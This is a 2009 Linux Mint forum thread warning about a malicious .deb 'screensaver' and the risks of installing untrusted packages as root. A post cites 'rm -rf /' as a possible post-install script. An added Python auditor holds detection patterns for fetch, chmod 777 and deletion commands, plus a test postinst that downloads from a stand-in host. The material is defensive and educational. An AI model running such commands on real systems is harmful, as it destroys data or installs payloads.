A deb package claiming to be a screensaver is malicious

Postby Husse on Sat Dec 12, 2009 9:36 am

Found over at the Ubuntu forums
http://ubuntuforums.org/showthread.php?t=1349678
The key points here are:
Installed a deb from a site - only install from reliable sources
Installed with sudo - if you are root "everything" is possible
This is no screensaver but an app that connects to a site called mmowned.com and tries to download malicious code
However, the code seems not to be working very well
Don't fix it if it ain't broken, don't break it if you can't fix it

Re: A deb package claiming to be a screensaver is malicious

Postby rich_roast on Sat Dec 12, 2009 11:22 am

Maybe I'm naïve but in almost a decade of using Linux on/off this is the first actual report of a specific malicious installer I've ever seen. First time for everything, I guess :roll:

Re: A deb package claiming to be a screensaver is malicious

Postby netguz on Sat Dec 12, 2009 11:37 am

All a little beyond me!

Does this help?

http://www.mywot.com/en/forum/4227-mmow ... -green-lit

:)

Re: A deb package claiming to be a screensaver is malicious

Postby midas on Sun Dec 13, 2009 3:55 am

Isn't it generally spoken not tricky to download themes and packages from websites outside synaptic??
Even installing a downloaded theme requires to install in the root-system. The safest way is not downloading and installing something outside the official Mint-repo. By doing so you will keep linux as safe as possible...
Linux Mint 16 Cinnamon (64 bits)

Re: A deb package claiming to be a screensaver is malicious

Postby myspacecommassergio on Sun Dec 13, 2009 10:43 am

weird...normally from what I hear Linux doesn't have these kind of situations lol. Thanks for the heads up! 8)

Re: A deb package claiming to be a screensaver is malicious

Postby Husse on Sun Dec 13, 2009 10:51 am

@ myspacecommassergio
You are right but if you install a .deb package as root you invite the package into your system

Re: A deb package claiming to be a screensaver is malicious

Postby myspacecommassergio on Tue Dec 15, 2009 5:49 pm

Husse wrote:@ myspacecommassergio
You are right but if you install a .deb package as root you invite the package into your system



oh wow I'm new to the community... so I gotta install only trusted .debs then when using the sudo command, gotcha friend, thanks for the warning, I had no clue :!:

I'm new to this ha xD

:lol: :lol: :lol: :lol: :lol: :lol:

Re: A deb package claiming to be a screensaver is malicious

Postby Madel on Tue Dec 15, 2009 9:58 pm

Anyone who knows how to program can create a malicious program and make it a .deb file.
It's up to the user's stupidity to install such an untrusted program. (Same applies to all other operating systems.)

Though, it's from gnome's site, which makes most users think it's safe.

Re: A deb package claiming to be a screensaver is malicious

Postby XidCat on Wed Dec 16, 2009 11:17 pm

The URL given in the link has Bots in it? xxxxx05748.t35.com/Bots/xxxxx ? Also he used chmod 777 on a script, never a good idea to cough up universal access on anything much less a script. Lots of lessons to be learned here.
"Contrariwise", continued Tweedledee, "if it was so, it might be; and if it were so, it would be; but as it isn't, it ain't. That's logic."

Lewis Carroll, Through the Looking-Glass, Chapter 4

Re: A deb package claiming to be a screensaver is malicious

Postby clem on Thu Dec 17, 2009 8:41 am

DEB packages do not only contain data, they can also contain executable code. A lot of packages do, and this code is executed with root permission. So for instance, a DEB could contain "nothing" and have an "rm -rf /" as its post-installation script, and that would be run as root...

So be aware that debs aren't simply containers, they're very much like Windows self-installing .exe files, and they get run with full permissions. One of the main reasons why Linux is safer than Windows is because distributions package the available software themselves and so you rarely have to get .debs from untrusted sources, whereas Windows simply provides the OS and lets you browse the Web to get everything else... so most Windows users are used to installing things they don't know without looking at where it came from. Don't be tempted to do the same under Linux as it's just as dangerous.

Clem.
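
Added example (not part of the original thread or any poster's code): a way to read the maintainer scripts clem describes out of a .deb without installing it, and flag the behaviours mentioned in this thread. The pattern list, function names and the sample package built inline are assumptions made for illustration.

```python
import io, re, tarfile

SCRIPTS = {"preinst", "postinst", "prerm", "postrm", "config"}  # run as root by dpkg
SUSPICIOUS = {  # heuristics taken from this thread, not a complete detector
    "network fetch": re.compile(r"\b(wget|curl)\b"),
    "chmod 777": re.compile(r"\bchmod\s+(-\w+\s+)*0?777\b"),
    "recursive delete": re.compile(r"\brm\s+-\w*r\w*\s+/"),
}

def ar_members(blob):
    """Yield (name, data) for each member of the ar archive that wraps a .deb."""
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]            # fixed 60-byte member header
        name = hdr[:16].decode().strip().rstrip("/")
        size = int(hdr[48:58].decode().strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)       # members are padded to even offsets

def maintainer_scripts(deb):
    """Return {name: text} from control.tar.{gz,xz,bz2}; nothing is executed."""
    for name, data in ar_members(deb):
        if name.startswith("control.tar"):
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
                return {m.name.lstrip("./"): tar.extractfile(m).read().decode("utf-8", "replace")
                        for m in tar if m.isfile() and m.name.lstrip("./") in SCRIPTS}
    raise ValueError("no control archive found")

def audit(deb):
    """Return sorted (script, finding) pairs for scripts matching a heuristic."""
    return sorted((s, label) for s, text in maintainer_scripts(deb).items()
                  for label, rx in SUSPICIOUS.items() if rx.search(text))

def build_sample_deb(postinst):
    """Constructed test input: a .deb-shaped archive holding only a postinst."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("./postinst")
        info.size = len(postinst)
        tar.addfile(info, io.BytesIO(postinst))
    def member(name, data):
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n"
        return hdr.encode() + data + (b"\n" if len(data) & 1 else b"")
    return b"!<arch>\n" + member("debian-binary", b"2.0\n") + member("control.tar.gz", buf.getvalue())

# Constructed sample script; it is only scanned as text, never run.
SAMPLE = build_sample_deb(b"#!/bin/sh\nwget -q http://example.invalid/x -O /tmp/x\nchmod 777 /tmp/x\n")
print(audit(SAMPLE))
```

For a real file, pass `open(path, "rb").read()` to `audit()`. An empty result only means none of these three patterns matched, so the scripts still need to be read.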

Re: A deb package claiming to be a screensaver is malicious

Postby clem on Thu Dec 17, 2009 10:47 am

ikey wrote:I have noticed a culture of 'selective reading' among newer users recently. i.e. they want results instantly
so will take the quickest path to...


Oh... I just selectively read that Ikey, and for a moment I thought you were talking about me :lol:

Re: A deb package claiming to be a screensaver is malicious

Postby ArcherSeven on Thu Dec 17, 2009 5:23 pm

Lol, awesome.

Re: A deb package claiming to be a screensaver is malicious

Postby Husse on Fri Dec 18, 2009 6:13 am

:mrgreen:

Re: A deb package claiming to be a screensaver is malicious

Postby ipernar on Fri Dec 18, 2009 7:25 am

It's very hard to make any program that would run on all Linux machines without the user's extra help. That's why Linux viruses have no chance. You have to be a madman to create such...
"Chicks come and go but you will always have your PS3. "

Re: A deb package claiming to be a screensaver is malicious

Postby markfiend on Mon Dec 21, 2009 7:38 am

ikey wrote:A chain is only as strong as its weakest link, so they say. I think Linux users should still be aware that any system
is still fallible in some way or other. Just because Linux is fundamentally more secure, this does not mean that
users should throw all caution to the wind.

Or as the saying goes: the most common source of computer failure is between the keyboard and the chair...
Omnia mutantur, nihil interit.

Re: A deb package claiming to be a screensaver is malicious

Postby Husse on Mon Dec 21, 2009 7:43 am

Or as the saying goes: the most common source of computer failure is between the keyboard and the chair...

Also called SBS :)
If you don't know what SBS is try to figure it out :)

Re: A deb package claiming to be a screensaver is malicious

Postby myspacecommassergio on Fri Jan 01, 2010 1:07 am

Madel wrote: Anyone who knows how to program can create a malicious program and make it a .deb file.
It's up to the user's stupidity to install such an untrusted program. (Same applies to all other operating systems.)

Though, it's from gnome's site, which makes most users think it's safe.



well... to me personally stupid is when you know it's going to turd in your cornflakes and then you do it on purpose anyways.


If you told someone hey "here's a virus that will KO your computer launch it/run it" and the user says oh... a virus... how exciting let me run it *click*

Then that's what I'd call stupid.

Now if someone's new to this and they go to a website full of .exe files or for Linux full of .deb files and this is their first time using either OS then I wouldn't call them stupid I would rather say that's a learning experience and to watch out next time. Because if you don't know dude then honestly you're not stupid you just seriously didn't know.

Re: A deb package claiming to be a screensaver is malicious

Postby greyaxe90 on Sat Jan 02, 2010 4:41 pm

And this is why I can't help but to have some fun with the people who say that Linux/Mac can't get viruses. I emphasize on can't. Some people honest to God believe that just because they're on Mac or Linux, they are invincible from viruses. Then every now and then, something like this pops up. Although I've seen it happen more on Linux, I'm surprised it doesn't happen more on Mac. But I've seen the "screensaver" trick done on Mac too.

Re: A deb package claiming to be a screensaver is malicious

Postby Husse on Sat Jan 02, 2010 5:12 pm

To get this "scary thing" to happen you had to trick the user to use sudo
When you're root lots of things can happen, that's why you should avoid it
But yes, viruses can infect Linux, but they have a much harder time than in Windows (don't know about Mac)

Re: A deb package claiming to be a screensaver is malicious

Postby greyaxe90 on Sat Jan 02, 2010 9:02 pm

Mac is about the same as Linux. Mac, in a sense, is comparable to Mint and Ubuntu where the user has to give permission for the software to run by inputting their password when they install it.